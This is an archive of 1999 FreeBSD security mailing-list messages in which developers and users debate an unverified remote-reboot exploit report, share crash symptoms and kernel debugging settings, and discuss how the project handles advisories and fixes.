Date: Wed, 5 May 1999 00:35:35 -0400 (EDT)
From: The Tech-Admin Dude
To: Don Lewis
Cc: Warner Losh, Darren Reed, freebsd-security@FreeBSD.ORG
Subject: Re: freebsd mbuf crash
In-Reply-To: <199905050003.RAA06539@salsa.gv.tsc.tdk.com>

Raise NMBCLUSTERS in kernel config file

On Tue, 4 May 1999, Don Lewis wrote:
> On May 4, 3:03pm, Warner Losh wrote:
> } Subject: Re: freebsd mbuf crash
> } In message <199905041526.BAA29421@cheops.anu.edu.au> Darren Reed writes:
> } : is this one (below) taken care of? perhaps a derivative of this?
> }
> } What's it supposed to do? I can't get it to cause any grief on my -current system, nor on the 3.1-stable based systems we have here at work.
>
> I believe this was fixed by version 1.103 of sys/netinet/ip_input.c. This change was made shortly after 3.0-RELEASE.
>
> The original exploit code only ran correctly on Linux (and nuked FreeBSD machines).
> It didn't do anything interesting when run under FreeBSD, because the byte order of various IP headers sent on raw sockets differs between Linux and FreeBSD. This caused various sanity checks in the FreeBSD stack to toss the packet instead of sending it. If you tweak the byte order in the exploit code, you can get it to run under FreeBSD and crash vulnerable FreeBSD machines.

From owner-freebsd-security Tue May 4 22:39:32 1999
To: Darren Reed
Cc: dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
In-reply-to: Your message of "Wed, 05 May 1999 12:57:12 +1000." <199905050257.MAA07852@cheops.anu.edu.au>
Date: Tue, 04 May 1999 22:39:04 -0700
Message-ID: <9230.925882744@zippy.cdrom.com>
From: "Jordan K. Hubbard"

> So at this point, are you or one of the other freebsd people going to post a reply to bugtraq requesting more information and/or denying that it is a problem until it can be proved more conclusively? Being on the cusp of a release & Usenix, this needs to be settled one way or another.

I can't speak for the others, but not being one of the security team folks I can say that I have no plans to say anything publicly about this.
- Jordan

From owner-freebsd-security Tue May 4 23:52:24 1999
Message-Id: <199905050651.AAA08231@harmony.village.org>
To: "Jordan K. Hubbard"
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 04 May 1999 22:39:04 PDT." <9230.925882744@zippy.cdrom.com>
References: <9230.925882744@zippy.cdrom.com>
Date: Wed, 05 May 1999 00:51:40 -0600
From: Warner Losh

-----BEGIN PGP SIGNED MESSAGE-----

In message <9230.925882744@zippy.cdrom.com> "Jordan K. Hubbard" writes:
: I can't speak for the others, but not being one of the security team
: folks I can say that I have no plans to say anything publicly about
: this.

Being the security officer, I can say, without reservation, that I have absolutely nothing to say about this publicly. I've sent mail to Jamie and to bugtraq asking for an explanation. Got zilch back so far. If and when there is a hole discovered, and the hole appears to be being exploited or easily exploited, then an advisory will be forthcoming. So far I have absolutely nothing to go on except conjecture, which is not the basis for any statements or advisories.
In general, many DoS things are quietly fixed in -stable. Sometimes the folks that fix them know they are fixing an implementation of what Bruce likes to call panic(3), other times they don't. There really hasn't been anything of earth-shaking importance that I've seen go in. Usually it is after the fixes go in that I see exploits start to crop up...

Warner

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBNy/qeNxynu/2qPVhAQGl2wP+IipljM57kSENjuxmyvBf43kwLOduJaRo
GBgGiAIgL1+M41lKPfr086Na0HCTOKgJB+bBCOsoBh5JknNc3WY3J9QoB+8IdY4B
GAFsAN0+Mq4PHPC7xikrYQyXJzLy9/D+uSGtT36ONhZJpvIKUCYeOPV4HcDCvz5g
/OnCFosMRU8=
=VAE+
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue May 4 23:57:13 1999
Message-Id: <199905050656.AAA08261@harmony.village.org>
To: Unknow User
Subject: Re: Security advisories
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 04 May 1999 19:56:36 -0300." <372F7B24.E352AEFF@tdnet.com.br>
References: <372F7B24.E352AEFF@tdnet.com.br> <372E4911.3A384379@tdnet.com.br> <199905042049.OAA04590@harmony.village.org>
Date: Wed, 05 May 1999 00:56:23 -0600
From: Warner Losh

In message <372F7B24.E352AEFF@tdnet.com.br> Unknow User writes:
: You really helped me, but where can I get such fixes?
: Is there any central site?

Yes. You will likely want to keep current with at least the kernel portion of -stable. Fixes are committed there from time to time. Sometimes these have security implications, other times they don't. It is hard to know a priori which ones will result in a potentially exploitable DoS, and which ones won't. The committers generally don't send me a heads-up when it could. Oftentimes it is months later that an exploit comes to light. See the handbook section on keeping current with FreeBSD for details on how to get the latest stable branch.

: When a user deletes a file, the OS only removes its inode, is there any
: utils that writes 1/0 to the Hard Disk blocks ?

Not that I'm aware of. The OS will never give those "dirty" blocks to a user w/o first zeroing them. They are still available on the raw device should you have good reason to expunge them from the disk.

: And about memory, is there any utils that fill in memory with 1/0 ?

No. Again, the OS doesn't give out dirty memory pages, so this generally isn't a problem. The only time it might be a problem is if a user breaks root and starts snooping in memory. However, if that happens, the active memory can be targeted and you likely have bigger problems to worry about.
Warner

From owner-freebsd-security Wed May 5 1:52:04 1999
Message-ID: <007a01be99f9$2b9f01e0$380051c2@greg.qmpgmc.ac.uk>
Reply-To: "Greg Quinlan"
From: "Greg Quinlan"
To: ,
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
Date: Sun, 9 May 1999 09:51:46 +0100

I updated to 3.1-Stable (3/05/99) so I am not confusing an earlier bug with the reboots I'm currently experiencing. (Which may be my problem: that I was just not up to date and reboots were due to a heavy-load-related bug.)

I have set:

    config kernel root on da0 dumps on da0
    options DDB
    options DDB_UNATTENDED

in the kernel.

Typically unexplained reboots take up to 6-7 days and can occur as often as twice a day! But no reboot yet (2 days)!

Greg

-----Original Message-----
From: Matthew Dillon
To: Raymond Wiker
Cc: freebsd-stable@FreeBSD.ORG; security@FreeBSD.ORG
Date: 05 May 1999 04:15
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)

> > Setup a serial console and monitor it so you can see the panic message.
> >
> > Or, better, configure the kernel to drop into DDB when it panics so you can do a stack 'trace', and report the results.
> > -Matt
> Matthew Dillon

From owner-freebsd-security Wed May 5 2:49:44 1999
Message-ID: <373013C5.33148183@granch.ru>
Date: Wed, 05 May 1999 16:47:49 +0700
From: "Rashid N. Achilov"
Organization: Granch Ltd.
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: freebsd mbuf crash
References: <199905041526.BAA29421@cheops.anu.edu.au>

Darren Reed wrote:
>
> is this one (below) taken care of? perhaps a derivative of this?
>
> darren
>
> /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
>  * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
>  */

Sample does not work :-) Clearly, it does not compile - must reset line "#include " up, below line "#include ", and add line "#include " below. And after successful compile it does not work :-) Compiled under 2.2.7, probed 2.2.7 also.

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Granch Ltd.
lead engineer
e-mail: achilov@granch.ru, tel (383-2) 24-2363

From owner-freebsd-security Wed May 5 4:01:33 1999
Date: Wed, 5 May 1999 16:59:39 +0600 (KGST)
From: CyberPsychotic
To: freebsd-security@freebsd.org
Cc: "Michael C. Vergallen"
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)

~ I don't see how this can be an exploit if you have /etc/hosts.deny and /etc/hosts.allow set up correctly and don't allow rcmd commands on your system..

This is not the case here I believe. If this bug really takes place, I would think that it's on the tcp or ip level, so the most you need here is some port being listened to.

~ I tried to remotely reboot my ftp server here and no it does not work

hmm.. depends on how you did that. Assuming from the other reports people send to the list, I believe the problem appears on the tcp/ip level _maybe_ with some specific kernel options turned on. I've played with a friend's of mine machine, bombing it with various sorts of malformed tcp/udp and just sick ip datagrams, but wasn't able to reproduce this.
If anyone who experienced the problem wouldn't mind sharing their log files/network traffic dump, I would appreciate that.

--
fygrave@tigerteam.net http://www.kalug.lug.net

From owner-freebsd-security Wed May 5 6:46:01 1999
Date: Wed, 5 May 1999 08:48:07 -0500
From: Alan McLean
To: Warner Losh
Cc: Unknown User, security@freebsd.org
Subject: Re: Security advisories
Message-ID: <19990505084807.A1046@flash.net>
References: <372F7B24.E352AEFF@tdnet.com.br> <372E4911.3A384379@tdnet.com.br> <199905042049.OAA04590@harmony.village.org> <372F7B24.E352AEFF@tdnet.com.br> <199905050656.AAA08261@harmony.village.org>
In-Reply-To: <199905050656.AAA08261@harmony.village.org>; from Warner Losh on Wed, May 05, 1999 at 12:56:23AM -0600

On Wed, May 05, 1999 at 12:56:23AM -0600, Warner Losh wrote:
> In message <372F7B24.E352AEFF@tdnet.com.br> Unknow User writes:
> > When a user deletes a file, the OS only removes its inode, is there any
> > utils that writes 1/0 to the Hard Disk blocks ?
>
> Not that I'm aware of. The OS will never give those "dirty" blocks to a user w/o first zeroing them. They are still available on the raw device should you have good reason to expunge them from the disk.
>
> > And about memory, is there any utils that fill in memory with 1/0 ?
>
> No. Again, the OS doesn't give out dirty memory pages, so this generally isn't a problem. The only time it might be a problem is if a user breaks root and starts snooping in memory. However, if that happens, the active memory can be targeted and you likely have bigger problems to worry about.

Here's an interesting paper and implementation about that:

http://www.cs.auckland.ac.nz/~pgut001/secure_del.html
http://gsu.linux.org.tr/wipe/

-amcl

From owner-freebsd-security Wed May 5 6:55:26 1999
Date: Wed, 05 May 1999 09:53:44 -0400 (EDT)
From: Seth
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
To: "Michael C. Vergallen"
Cc: Tim Priebe, Greg Quinlan, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG

Just out of curiosity, how were you attempting to remotely reboot your ftp server?

SB

On Wed, 5 May 1999, Michael C. Vergallen wrote:
> I don't see how this can be an exploit if you have /etc/hosts.deny and /etc/hosts.allow set up correctly and don't allow rcmd commands on your system.. I tried to remotely reboot my ftp server here and no it does not work on that machine and I also tried on my gateway machine and no luck there either.
> Now I will try my print server but I first have to upgrade that box to 3.1 ... However on my network I see more and more people scanning with a portscanner so I suppose I better keep a lookout for strange items in my log files.
>
> Michael
> ---
> Michael C. Vergallen A.k.A. Mad Mike,
> Sportstraat 28 http://www.double-barrel.be/mvergall/
> B 9000 Gent ftp://ftp.double-barrel.be/pub/linux/
> Belgium tel : 32-9-2227764 Fax : 32-9-2224976
>
> On Wed, 5 May 1999, Tim Priebe wrote:
>
> > I saw such behavior Sunday when trying to implement a new firewall. The system would repeatedly panic with a trap 12. This would happen immediately after the login prompt appeared after the previous panic. The system would be stable if I removed the first ethernet cable; plug the cable back in, and a short while later it would start over again. It was late, and we had to get the system working again, so we restored to the previous system. I have some information logged for packets at the time. I will check this and try to reproduce after I finish the course I am on this week.
> >
> > Tim.
> >
> > Greg Quinlan wrote:
> > >
> > > This sounds so.. so very familiar!!
> > >
> > > I have been the target of exploits before......
> > >
> > > The exact same thing I have been experiencing........but not for about 5 days now!
> > >
> > > I'm not convinced it's a pure exploit.. (i.e. a program specifically written for the purpose)
> > >
> > > Greg
> > >
> > > -----Original Message-----
> > > From: Karl Denninger
> > > To: chris@calldei.com; Jordan K. Hubbard
> > > Cc: Mike Smith; Seth; freebsd-stable@FreeBSD.ORG; security@FreeBSD.ORG; jamie@exodus.net
> > > Date: 04 May 1999 05:20
> > > Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
> > >
> > > > On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote:
> > > > > On Mon, May 3, 1999, Jordan K. Hubbard wrote:
> > > > > > > I have to say that Jamie really let us down by not running a raw tcpdump alongside the second targeted machine here. Any chance of provoking these people into "demonstrating" the exploit on a machine, while another connected to the same wire is running
> > > > > >
> > > > > > I'd say he or whomever first reported this to bugtraq let us down even more by releasing an "advisory" in such an unknown and unverifiable state. By doing so, all they've done is hand ammunition to the FUD corps and given us no reasonable chance to respond since the advisory
> > > > >
> > > > > I get the impression that that was the whole point of the bugtraq post, to give us more grief.
> > > >
> > > > Ding!
> > > >
> > > > Give that man a cigar.
> > > >
> > > > Anyone who saw this done to one machine and didn't *immediately* configure machine #2 to trap and trace on the second instance deserves raspberries - at a minimum.
> > > >
> > > > It's one thing to have it done "anonymously" (among other things you might not be there when it goes "boom" under those conditions!) It's another to have it done under controlled conditions and neither get an explanation OR trap the condition that caused it yourself with a tcpdump trace.
> > > >
> > > > --
> > > > --
> > > > Karl Denninger (karl@denninger.net) Web: fathers.denninger.net
> > > > I ain't even *authorized* to speak for anyone other than myself, so give up now on trying to associate my words with any particular organization.
From owner-freebsd-security Wed May 5 11:32:14 1999
Message-Id: <199905051830.LAA01118@dingo.cdrom.com>
To: Simon Karpen
Cc: Raymond Wiker, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-reply-to: Your message of "Tue, 04 May 1999 10:34:50 EDT."
Date: Wed, 05 May 1999 11:30:58 -0700
From: Mike Smith

> On Tue, 4 May 1999, Raymond Wiker wrote:
>
> > I have two other machines running 3.1-RELEASE in a slightly less hostile environment (i.e., no direct connections outwards), and they have been much more stable. I cannot rule out a hardware problem on the 486; I'll know for sure as soon as I upgrade it.
>
> I have 3.1-STABLE in a fairly hostile network environment. I've found that the following will make the system unstable and reboot. If you avoid all of these, it's solid as a rock. (Otherwise you get the reboots.)
>
> VESA support
> VM86 support

Naturally, it'd be really handy if you actually qualified what it is about these that causes your system to reboot. I'd be very dubious about the simple presence of either of these items causing random reboots, and the dearth of supporting information you've offered makes it much harder to help you.

--
\\ Sometimes you're ahead,       \\ Mike Smith
\\ sometimes you're behind.      \\ mike@smith.net.au
\\ The race is long, and in the  \\ msmith@freebsd.org
\\ end it's only with yourself.  \\ msmith@cdrom.com

From owner-freebsd-security Wed May 5 12:56:20 1999
Message-Id: <3730A208.75596C9B@softweyr.com>
Date: Wed, 05 May 1999 13:54:48 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Brett Glass
Cc: Jacob Zehnder, security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remotereboot exploit
References: <4.2.0.37.19990504212515.045d3100@localhost>

Brett Glass wrote:
>
> What would be the motivation for FUDding FreeBSD in this way? I would not panic, but I would also ask for more information and would not dismiss the report out of hand. The tone of Jordan's message makes him look defensive rather than cautious and diligent.

We just heard from the security-officer that followup emails have been made and that no other reports of exploits have been posted. Being the security officer is not Jordan's job; he was simply informing us that he wouldn't be saying anything about this until more is known. If it were widespread, we'd be hearing from CERT.

The fact that no information whatsoever was included in the post points out that the poster had no intention of helping in any way. What his motivations for this are we cannot tell.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                      Softweyr LLC
http://www.softweyr.com/~softweyr               wes@softweyr.com

From owner-freebsd-security Wed May 5 13:06:33 1999
Date: Wed, 5 May 1999 13:06:10 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199905052006.NAA28216@apollo.backplane.com>
To: Wes Peters, Brett Glass, Jacob Zehnder
Cc: security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remotereboot exploit
References: <4.2.0.37.19990504212515.045d3100@localhost> <3730A208.75596C9B@softweyr.com>

: ... garbage removed.

    This is getting ridiculous. You guys are feeding off your own detritus. Just because the information as imparted is not useful doesn't mean the poster intended to instigate FUD. Saying the information is not useful is fine. Shooting bazookas at him over a single nicely (if unhelpful) worded email is just being stupid.

    The best response to this sort of thing is to be professional; that way you win both ways.

-Matt
Matthew Dillon

From owner-freebsd-security Wed May 5 13:11:29 1999
Message-Id: <4.2.0.37.19990505140848.0458b850@localhost>
Date: Wed, 05 May 1999 14:10:59 -0600
To: Wes Peters
From: Brett Glass
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
Cc: Jacob Zehnder, security@FreeBSD.ORG, jamie@exodus.net
In-Reply-To: <3730A208.75596C9B@softweyr.com>
References: <4.2.0.37.19990504212515.045d3100@localhost>

At 01:54 PM 5/5/99 -0600, Wes Peters wrote:
> The fact that no information whatsoever was included in the post points out that the poster had no intention of helping in any way. What his motivations for this are we cannot tell.

I would certainly be curious. One doesn't gain prestige by posting an unverifiable report, and the degree of FUD generated by one unverified report is not significant.

--Brett Glass

From owner-freebsd-security Wed May 5 13:13:01 1999
Message-Id: <4.2.0.37.19990505141135.0454f510@localhost>
Date: Wed, 05 May 1999 14:12:26 -0600
To: Matthew Dillon, Wes Peters, Jacob Zehnder
From: Brett Glass
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remotereboot exploit
Cc: security@FreeBSD.ORG
In-Reply-To: <199905052006.NAA28216@apollo.backplane.com>
References: <4.2.0.37.19990504212515.045d3100@localhost> <3730A208.75596C9B@softweyr.com>

Actually, Matt, you have taken the proper professional action. There's not much else to be done until you get a response... or don't.

--Brett

At 01:06 PM 5/5/99 -0700, Matthew Dillon wrote:
> : ... garbage removed.
>
> This is getting ridiculous. You guys are feeding off your own detritus. Just because the information as imparted is not useful doesn't mean the poster intended to instigate FUD. Saying the information is not useful is fine. Shooting bazookas at him over a single nicely (if unhelpful) worded email is just being stupid.
The best response to this sort of thing > is to be professional, that way you win both ways. > > -Matt > Matthew Dillon > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 13:24:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 85BC814D09; Wed, 5 May 1999 13:24:09 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA17965; Wed, 5 May 1999 13:23:33 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA19609; Wed, 5 May 1999 13:23:33 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA07831; Wed, 5 May 99 13:23:26 PDT Message-Id: <3730A8B6.57370408@softweyr.com> Date: Wed, 05 May 1999 14:23:18 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Jorge Aldana Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jorge Aldana wrote: > > It seems from the responses that this is an acceptable symptom of FreeBSD > 3.1 (release and stable)? No. The responses indicate this had become a well-known problem in 3.1-RELEASE and has been fixed in -STABLE for quite some time. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com

From owner-freebsd-security Wed May 5 13:37:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from delenn.acm.rpi.edu (delenn.acm.rpi.edu [128.213.5.14]) by hub.freebsd.org (Postfix) with SMTP id 98C6B1545B for ; Wed, 5 May 1999 13:37:16 -0700 (PDT) (envelope-from slk@acm.rpi.edu) Received: (qmail 28385 invoked by uid 1120); 5 May 1999 20:37:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 5 May 1999 20:37:16 -0000 Date: Wed, 5 May 1999 16:37:15 -0400 (EDT) From: Simon Karpen To: Mike Smith Cc: Raymond Wiker , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <199905051830.LAA01118@dingo.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

[me: VM86 + VESA = reboot]

On Wed, 5 May 1999, Mike Smith wrote:
>
> Naturally, it'd be really handy if you actually qualified what it is
> about these that cause your system to reboot. I'd be very dubious
> about the simple presence of either of these items causing random
> reboots, and the dearth of supporting information you've offered makes
> it much harder to help you.

Right now I'm preparing to ship the box, so I can't do any more detailed testing.

Once it's in its new location next week (think end of semester), I'll do much more extensive testing.

The only other piece of info I can give right now is that Realplayer/Linux playing a high bitrate file was a good way to speed up the crash.

Try VESA+VM86 in your kernel, boot up with a 640x480 splashscreen, and play stuff using Realplayer/Linux for half an hour or so. (maybe an hour or two) I'd be quite surprised if you didn't get a reboot.
--Simon -- Simon Karpen karpes@rpi.edu slk@acm.rpi.edu #include I don't speak for RPI in any way. "Those that give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." --Ben Franklin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 14: 5:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (Postfix) with ESMTP id 70588159E6; Wed, 5 May 1999 14:04:42 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.3/8.8.8) with ESMTP id OAA02308; Wed, 5 May 1999 14:02:58 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199905052102.OAA02308@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Simon Karpen Cc: Mike Smith , Raymond Wiker , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Wed, 05 May 1999 16:37:15 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 05 May 1999 14:02:58 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > [me: VM86 + VESA = reboot] > > On Wed, 5 May 1999, Mike Smith wrote: > > > > Naturally, it'd be really handy if you actually qualified what it is > > about these that cause your system to reboot. I'd be very dubious > > about the simple presence of either of these items causing random > > reboots, and the dearth of supporting information you've offered makes > > it much harder to help you. > > Right now I'm preparing to ship the box, so I can't do any more > detailed testing. > > Once it's in its new location next week (think end of semester), > I'll do much more extensive testing. 
> > The only other piece of info I can give right now is that Realplayer/Linux > plaing a high bitrate file was a good way to speed up the crash. > > Try VESA+VM86 in your kernel, boot up with a 640x480 splashscreen, > and play stuff using Realplayer/Linux for half an hour or so. > (maybe an hour or two) I'd be quite surprised if you didn't get a reboot. I'd be much more interested in any sort of logical thread you can string between these datapoints. I boot with an 800x600 splash on my laptop, which I then pound to death in various other ways, but (modulo timecounter braindeath) it's 100% stable. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 14:45:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from angel.double-barrel.be (mail.double-barrel.be [194.7.102.22]) by hub.freebsd.org (Postfix) with ESMTP id 5884F14BE7 for ; Wed, 5 May 1999 14:45:37 -0700 (PDT) (envelope-from mvergall@double-barrel.be) Received: from double-barrel.be (ws1.double-barrel.be [194.7.102.29]) by angel.double-barrel.be (8.9.1b+Sun/8.9.1) with ESMTP id XAA01516; Wed, 5 May 1999 23:44:51 +0200 (MET DST) Message-ID: <3730BC13.9EA40ED9@double-barrel.be> Date: Wed, 05 May 1999 23:45:55 +0200 From: "Michael C. Vergallen" X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 sun4m) X-Accept-Language: en MIME-Version: 1.0 To: CyberPsychotic Cc: freebsd-security@freebsd.org, "Michael C. Vergallen" Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org CyberPsychotic wrote: > hmm.. depends on how you did that. 
Assuming from the other reports people
> send to the list, I believe the problem appears on tcp/ip level _maybe_ with
> some specific kernel options turned on. I've played with a friend's of mine
> machine bombing it with various sorts of malformed tcp/udp and just sick ip
> datagrams but wasn't able to reproduce this. If anyone experienced the
> problem wouldn't mind to share their log files/network traffic dump, I would
> appreciate that.

I've been generating packets of different sizes and only once have I managed to lock the box up, while transferring a 1 GB image file and pulling the cable to the disc-crate by accident.

Michael

From owner-freebsd-security Wed May 5 14:56:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from angel.double-barrel.be (mail.double-barrel.be [194.7.102.22]) by hub.freebsd.org (Postfix) with ESMTP id D264715047; Wed, 5 May 1999 14:56:11 -0700 (PDT) (envelope-from mvergall@double-barrel.be) Received: from double-barrel.be (ws1.double-barrel.be [194.7.102.29]) by angel.double-barrel.be (8.9.1b+Sun/8.9.1) with ESMTP id XAA01521; Wed, 5 May 1999 23:54:57 +0200 (MET DST) Message-ID: <3730BE71.B1D7B36F@double-barrel.be> Date: Wed, 05 May 1999 23:56:01 +0200 From: "Michael C. Vergallen" X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 sun4m) X-Accept-Language: en MIME-Version: 1.0 To: Seth Cc: "Michael C. Vergallen" , Tim Priebe , Greg Quinlan , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Seth wrote:
> Just out of curiosity, how were you attempting to remotely reboot your ftp
> server?
>

Sending large packets, incomplete packets, small packets etc.
I have also only seen a FreeBSD box panic once, that is when I tripped on my server's cabling and pulled the host adapter cable loose from the disc crate; that was when I was transferring a large 1 GB file as a test to see if the TCP stack was up to scratch. Now the system panicked when trying to flush a block to disc.

Michael

From owner-freebsd-security Wed May 5 15:49:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from rage.arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id D89E214E60; Wed, 5 May 1999 15:49:49 -0700 (PDT) (envelope-from jamie@rage.arpa.com) Received: (from jamie@localhost) by rage.arpa.com (8.9.3/8.9.3) id RAA43154; Wed, 5 May 1999 17:48:33 -0500 (CDT) Date: Wed, 5 May 1999 17:48:32 -0500 From: Jamie Rishaw To: Karl Denninger Cc: chris@calldei.com, "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Message-ID: <19990505174832.A41704@rage.arpa.com> References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> <19990503225131.I10291@holly.dyndns.org> <19990503231813.A11570@Denninger.Net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19990503231813.A11570@Denninger.Net>; from Karl Denninger on Mon, May 03, 1999 at 11:18:13PM -0500 X-No-Archive: Yes X-Face: d=) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Actually, I'm not on any fbsd mail lists, and I'm in the process of moving from Chicago to LA. This is the first time I've been on my mail in quite a while. (Days).

I'll get a tcpdump some time when I can get someone to reset a box, but it's not exactly on my list of priorities to have production boxen of mine rebooted mid-stream.
I'm perhaps the biggest fbsd proponent in my company. I did not intend to slander or annoy anyone; rather, to get people out trying to figure out what the exploit is, and get to work.

For everyone's info, the boxen were rebooted first, then responsibility was claimed later. I didn't know of these attacks until after they were done.

As far as "the second machine", the second machine is one of several machines. The second machine is in a different physical location, different backbone, different hardware. It does about two megabits/sec, so running a blind "tcpdump" is really not possible.

Any flames from this will be /dev/null'd. I'm not out to fight with anyone about anything. No time.

-jamie

On Mon, May 03, 1999 at 11:18:13PM -0500, Karl Denninger wrote:
> On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote:
> > On Mon, May 3, 1999, Jordan K. Hubbard wrote:
> > > > I have to say that Jamie really let us down by not running a raw
> > > > tcpdump alongside the second targeted machine here. Any chance of
> > > > provoking these people into "demonstrating" the exploit on a machine,
> > > > while another connected to the same wire is running
> > >
> > > I'd say he or whomever first reported this to bugtraq let us down even
> > > more by releasing an "advisory" in such an unknown and unverifiable
> > > state. By doing so, all they've done is hand ammunition to the FUD
> > > corps and given us no reasonable chance to respond since the advisory
> >
> > I get the impression that that was the whole point of the
> > bugtraq post, to give us more grief.
>
> Ding!
>
> Give that man a cigar.
>
> Anyone who saw this done to one machine and didn't *immediately* configure
> machine #2 to trap and trace on the second instance deserves raspberries -
> at a minimum.
>
> It's one thing to have it done "anonymously" (among other things you might
> not be there when it goes "boom" under those conditions!)
